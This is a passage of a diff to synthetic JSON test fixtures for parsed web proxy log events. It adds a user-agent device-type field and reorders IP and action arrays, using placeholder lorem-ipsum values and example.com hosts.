Safari/537.36", "user_agent.os.full": "Android 7.0", 
@@ -1510,6 +1529,7 @@ "url.original": "https://www5.example.org/oeni/tdol.gif?llamco=nea#psum", "user.name": "ulapar", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -1559,8 +1579,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uaUten", "rsa.misc.action": [ - "Blocked", - "amcorp" + "amcorp", + "Blocked" ], "rsa.misc.category": "umdolor", "rsa.misc.filter": "velillu", @@ -1586,6 +1606,7 @@ "url.original": "https://www.example.com/uasiar/utlab.htm?loremqu=dantium#lor", "user.name": "lor", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -1635,8 +1656,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tdol", "rsa.misc.action": [ - "Allowed", - "nte" + "nte", + "Allowed" ], "rsa.misc.category": "adeseru", "rsa.misc.filter": "mac", @@ -1662,6 +1683,7 @@ "url.original": "https://api.example.org/icabo/gna.html?urerepr=eseru#quamest", "user.name": "snost", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", 
@@ -1738,6 +1760,7 @@ "url.original": "https://api.example.org/oremi/elites.html?iosa=boNemoe#onsequ", "user.name": "olori", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1772,8 +1795,8 @@ "stenatu4844.www.invalid" ], "related.ip": [ - "10.24.111.229", - "10.39.31.115" + "10.39.31.115", + "10.24.111.229" ], "related.user": [ "fugi" @@ -1814,6 +1837,7 @@ "url.original": "https://example.com/luptatem/uaeratv.gif?dat=periam#dqu", "user.name": "fugi", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -1890,6 +1914,7 @@ "url.original": "https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", "user.name": "boreetdo", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -1924,8 +1949,8 @@ "dquia107.www.test" ], "related.ip": [ - "10.128.173.19", - "10.88.172.34" + "10.88.172.34", + "10.128.173.19" ], "related.user": [ "agnaaliq" @@ -1939,8 +1964,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ntNeq", "rsa.misc.action": [ - "dtempo", - "Blocked" + "Blocked", + "dtempo" ], "rsa.misc.category": "ipsu", "rsa.misc.filter": "iqu", 
@@ -1966,6 +1991,7 @@ "url.original": "https://api.example.com/ori/tconsect.html?ercit=eporroq#ulla", "user.name": "agnaaliq", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -2000,8 +2026,8 @@ "lloin4019.www.localhost" ], "related.ip": [ - "10.238.224.49", - "10.130.241.232" + "10.130.241.232", + "10.238.224.49" ], "related.user": [ "onse" @@ -2015,8 +2041,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "mnisiut", "rsa.misc.action": [ - "mod", - "Allowed" + "Allowed", + "mod" ], "rsa.misc.category": "uiinea", "rsa.misc.filter": "aturQu", @@ -2042,6 +2068,7 @@ "url.original": "https://api.example.org/rure/asiarchi.txt?loremeu=aturve#utfug", "user.name": "onse", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2076,8 +2103,8 @@ "tamet6317.www.host" ], "related.ip": [ - "10.115.53.31", - "10.2.67.127" + "10.2.67.127", + "10.115.53.31" ], "related.user": [ "Cic" @@ -2118,6 +2145,7 @@ "url.original": "https://example.com/emUte/molestia.htm?orroqu=elitsed#labore", "user.name": "Cic", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -2152,8 +2180,8 @@ "saquaea6344.www.invalid" ], "related.ip": [ - "10.204.214.251", - "10.101.38.213" + "10.101.38.213", + "10.204.214.251" ], "related.user": [ "ueipsa" @@ -2167,8 +2195,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tasun", "rsa.misc.action": [ - "quasiarc", - "Allowed" + "Allowed", + "quasiarc" ], "rsa.misc.category": "autfugi", "rsa.misc.filter": "ritqu", @@ -2194,6 +2222,7 @@ "url.original": "https://mail.example.net/repreh/plic.jpg?utlabo=tetur#tionula", "user.name": "ueipsa", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2228,8 +2257,8 @@ "utaliqu4248.www.localhost" ], "related.ip": [ - "10.18.226.72", - "10.101.85.169" + "10.101.85.169", + "10.18.226.72" ], "related.user": [ "rroqu" @@ -2270,6 +2299,7 @@ "url.original": "https://api.example.com/tcu/iatqu.jpg?quovo=urExcep#ema", "user.name": "rroqu", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2346,6 +2376,7 @@ "url.original": "https://www5.example.com/apariatu/lorsita.gif?msequ=uat#lupta", "user.name": "stenatus", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", 
@@ -2422,6 +2453,7 @@ "url.original": "https://internal.example.net/ende/abor.jpg?riameaqu=ame#tesseq", "user.name": "itasp", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -2456,8 +2488,8 @@ "lapar1599.www.lan" ], "related.ip": [ - "10.106.77.138", - "10.193.66.155" + "10.193.66.155", + "10.106.77.138" ], "related.user": [ "iusmodt" @@ -2471,8 +2503,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uteir", "rsa.misc.action": [ - "Allowed", - "Section" + "Section", + "Allowed" ], "rsa.misc.category": "cididu", "rsa.misc.filter": "Utenima", @@ -2498,6 +2530,7 @@ "url.original": "https://example.com/ame/amvolu.txt?equaturv=lamc#mvolupta", "user.name": "iusmodt", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2547,8 +2580,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tec", "rsa.misc.action": [ - "Allowed", - "tatema" + "tatema", + "Allowed" ], "rsa.misc.category": "emullamc", "rsa.misc.filter": "emveleum", 
@@ -2574,6 +2607,7 @@ "url.original": "https://mail.example.org/uisnostr/reetdol.txt?ugi=niamquis#nisi", "user.name": "mUteni", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -2608,8 +2642,8 @@ "ura675.mail.localdomain" ], "related.ip": [ - "10.131.246.134", - "10.49.242.174" + "10.49.242.174", + "10.131.246.134" ], "related.user": [ "umdolo" @@ -2650,6 +2684,7 @@ "url.original": "https://api.example.com/radipis/cive.gif?orumSec=nisiuta#stiaecon", "user.name": "umdolo", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -2684,8 +2719,8 @@ "iamea478.www5.host" ], "related.ip": [ - "10.142.120.198", - "10.166.10.42" + "10.166.10.42", + "10.142.120.198" ], "related.user": [ "olori" @@ -2726,6 +2761,7 @@ "url.original": "https://mail.example.org/oin/itseddoe.html?citati=uamei#eursinto", "user.name": "olori", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -2802,6 +2838,7 @@ "url.original": "https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS", "user.name": "etur", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -2851,8 +2888,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ese", "rsa.misc.action": [ - "Allowed", - "litanim" + "litanim", + "Allowed" ], "rsa.misc.category": "idata", "rsa.misc.filter": "urerepre", @@ -2878,6 +2915,7 @@ "url.original": "https://example.net/snulap/enimadm.html?writte=sitvo#ine", "user.name": "isau", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2912,8 +2950,8 @@ "orp5697.www.invalid" ], "related.ip": [ - "10.55.81.14", - "10.243.6.41" + "10.243.6.41", + "10.55.81.14" ], "related.user": [ "eiusmo" @@ -2954,6 +2992,7 @@ "url.original": "https://internal.example.org/etcon/onsequu.gif?Bonoru=madminim#ents", "user.name": "eiusmo", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3003,8 +3042,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "lit", "rsa.misc.action": [ - "Blocked", - "quu" + "quu", + "Blocked" ], "rsa.misc.category": "oluptate", "rsa.misc.filter": "exercita", 
@@ -3030,6 +3069,7 @@ "url.original": "https://www.example.org/rur/itse.gif?pisciv=fugiatqu#seos", "user.name": "rios", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3064,8 +3104,8 @@ "fficia2304.www5.home" ], "related.ip": [ - "10.20.124.138", - "10.158.18.51" + "10.158.18.51", + "10.20.124.138" ], "related.user": [ "CSe" @@ -3106,6 +3146,7 @@ "url.original": "https://mail.example.com/qui/equeporr.jpg?itsedd=texpli#liquipex", "user.name": "CSe", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3140,8 +3181,8 @@ "mquisnos7453.home" ], "related.ip": [ - "10.134.128.27", - "10.118.177.136" + "10.118.177.136", + "10.134.128.27" ], "related.user": [ "Utenima" @@ -3155,8 +3196,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "voluptas", "rsa.misc.action": [ - "olor", - "Allowed" + "Allowed", + "olor" ], "rsa.misc.category": "ataevita", "rsa.misc.filter": "nderi", @@ -3182,6 +3223,7 @@ "url.original": "https://api.example.net/lup/iumtotam.html?ipitlabo=userror#eacommo", "user.name": "Utenima", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", 
@@ -3216,8 +3258,8 @@ "aquio748.www.localhost" ], "related.ip": [ - "10.68.8.143", - "10.125.120.97" + "10.125.120.97", + "10.68.8.143" ], "related.user": [ "reet" @@ -3258,6 +3300,7 @@ "url.original": "https://example.org/onproide/uamnih.htm?tatisetq=uidolo#umdolore", "user.name": "reet", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3292,8 +3335,8 @@ "remagnam796.mail.corp" ], "related.ip": [ - "10.143.0.78", - "10.137.164.122" + "10.137.164.122", + "10.143.0.78" ], "related.user": [ "orissus" @@ -3307,8 +3350,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "etdol", "rsa.misc.action": [ - "Blocked", - "mwrit" + "mwrit", + "Blocked" ], "rsa.misc.category": "inim", "rsa.misc.filter": "aturQu", @@ -3334,6 +3377,7 @@ "url.original": "https://www5.example.org/obeataev/umf.htm?moll=quaeabil#emip", "user.name": "orissus", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -3368,8 +3412,8 @@ "etdolore4227.internal.corp" ], "related.ip": [ - "10.30.87.51", - "10.156.177.53" + "10.156.177.53", + "10.30.87.51" ], "related.user": [ "psaquaea" 
@@ -3410,6 +3454,7 @@ "url.original": "https://mail.example.org/consequa/eaqueip.gif?aevitaed=byCic#leumiur", "user.name": "psaquaea", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3444,8 +3489,8 @@ "rors1935.api.domain" ], "related.ip": [ - "10.83.138.34", - "10.111.249.184" + "10.111.249.184", + "10.83.138.34" ], "related.user": [ "dentsunt" @@ -3486,6 +3531,7 @@ "url.original": "https://example.org/tmo/onofdeF.txt?oremip=its#uptasnul", "user.name": "dentsunt", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -3562,6 +3608,7 @@ "url.original": "https://mail.example.com/orsitvol/ntor.htm?itqu=minimav#smodtem", "user.name": "taliq", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", 
@@ -3638,6 +3685,7 @@ "url.original": "https://internal.example.org/rumexe/xerci.gif?olor=quiav#gna", "user.name": "lamcolab", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -3670,8 +3718,8 @@ "tecto708.www5.example" ], "related.ip": [ - "10.22.122.43", - "10.100.143.226" + "10.100.143.226", + "10.22.122.43" ], "related.user": [ "ute" @@ -3685,8 +3733,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ento", "rsa.misc.action": [ - "Blocked", - "Bonoru" + "Bonoru", + "Blocked" ], "rsa.misc.category": "luptasnu", "rsa.misc.filter": "quamni", @@ -3712,6 +3760,7 @@ "url.original": "https://example.org/tvolu/dutper.html?nbyCicer=scipit#equuntu", "user.name": "ute", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3746,8 +3795,8 @@ "ine3181.www.invalid" ], "related.ip": [ - "10.121.9.5", - "10.119.53.68" + "10.119.53.68", + "10.121.9.5" ], "related.user": [ "ssec" @@ -3788,6 +3837,7 @@ "url.original": "https://www.example.com/uiavo/uisaut.htm?paq=uianon#nul", "user.name": "ssec", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", 
@@ -3864,6 +3914,7 @@ "url.original": "https://mail.example.com/uasiarch/Malor.jpg?iinea=snos#upt", "user.name": "sci", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -3896,8 +3947,8 @@ "pitl6126.www.localdomain" ], "related.ip": [ - "10.243.182.229", - "10.229.102.140" + "10.229.102.140", + "10.243.182.229" ], "related.user": [ "duntut" @@ -3911,8 +3962,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "epor", "rsa.misc.action": [ - "etquasia", - "Allowed" + "Allowed", + "etquasia" ], "rsa.misc.category": "iaturE", "rsa.misc.filter": "rep", @@ -3938,6 +3989,7 @@ "url.original": "https://api.example.org/ntiumt/sumquia.jpg?lam=asnu#com", "user.name": "duntut", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -4010,6 +4062,7 @@ "url.original": "https://example.com/itsedqu/paq.jpg?hilmol=oluptate#todi", "user.name": "picia", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4086,6 +4139,7 @@ "url.original": "https://api.example.org/remeum/etur.html?Quisa=quiav#ctionofd", "user.name": "onsec", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", 
@@ -4120,8 +4174,8 @@ "cia5990.api.localdomain" ], "related.ip": [ - "10.89.41.97", - "10.91.2.225" + "10.91.2.225", + "10.89.41.97" ], "related.user": [ "tem" @@ -4135,8 +4189,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "iuntN", "rsa.misc.action": [ - "nim", - "Allowed" + "Allowed", + "nim" ], "rsa.misc.category": "etco", "rsa.misc.filter": "autodita", @@ -4162,6 +4216,7 @@ "url.original": "https://internal.example.org/ree/itten.gif?rsp=imipsa#nostrum", "user.name": "tem", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -4196,8 +4251,8 @@ "riatu2467.lan" ], "related.ip": [ - "10.7.18.226", - "10.221.20.165" + "10.221.20.165", + "10.7.18.226" ], "related.user": [ "uasiarch" @@ -4238,6 +4293,7 @@ "url.original": "https://www.example.net/ritquiin/reseo.jpg?ari=umtot#onemulla", "user.name": "uasiarch", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", 
@@ -4314,6 +4370,7 @@ "url.original": "https://mail.example.com/dexe/nemul.jpg?yCicero=inimave#eavolupt", "user.name": "inrepreh", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -4390,6 +4447,7 @@ "url.original": "https://mail.example.org/caecat/uel.html?enim=umq#sistena", "user.name": "olup", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4422,8 +4480,8 @@ "imveni193.www5.host" ], "related.ip": [ - "10.55.38.153", - "10.112.190.154" + "10.112.190.154", + "10.55.38.153" ], "related.user": [ "oremeu" @@ -4437,8 +4495,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tin", "rsa.misc.action": [ - "Allowed", - "urau" + "urau", + "Allowed" ], "rsa.misc.category": "isiut", "rsa.misc.filter": "cons", @@ -4464,6 +4522,7 @@ "url.original": "https://mail.example.com/runtmoll/busBon.txt?ionev=vitaedi#rna", "user.name": "oremeu", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", 
@@ -4540,6 +4599,7 @@ "url.original": "https://api.example.com/lits/tvolu.jpg?squir=gnaaliq#quam", "user.name": "tsedquia", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -4574,8 +4634,8 @@ "remips1499.www.local" ], "related.ip": [ - "10.60.52.219", - "10.252.164.230" + "10.252.164.230", + "10.60.52.219" ], "related.user": [ "gnamali" @@ -4589,8 +4649,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "rroq", "rsa.misc.action": [ - "Blocked", - "fdeFin" + "fdeFin", + "Blocked" ], "rsa.misc.category": "diduntut", "rsa.misc.filter": "ano", @@ -4616,6 +4676,7 @@ "url.original": "https://mail.example.net/loremi/queporro.jpg?ade=nihilmol#nder", "user.name": "gnamali", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -4646,8 +4707,8 @@ "mdoloree96.domain" ], "related.ip": [ - "10.187.16.73", - "10.122.102.156" + "10.122.102.156", + "10.187.16.73" ], "related.user": [ "emoen" @@ -4661,8 +4722,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "dipisc", "rsa.misc.action": [ - "turad", - "Allowed" + "Allowed", + "turad" ], "rsa.misc.category": "ulpaquio", "rsa.misc.filter": "ngelits", @@ -4688,6 +4749,7 @@ "url.original": "https://api.example.com/nge/psum.gif?exerci=isnostru#iad", "user.name": "emoen", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", 
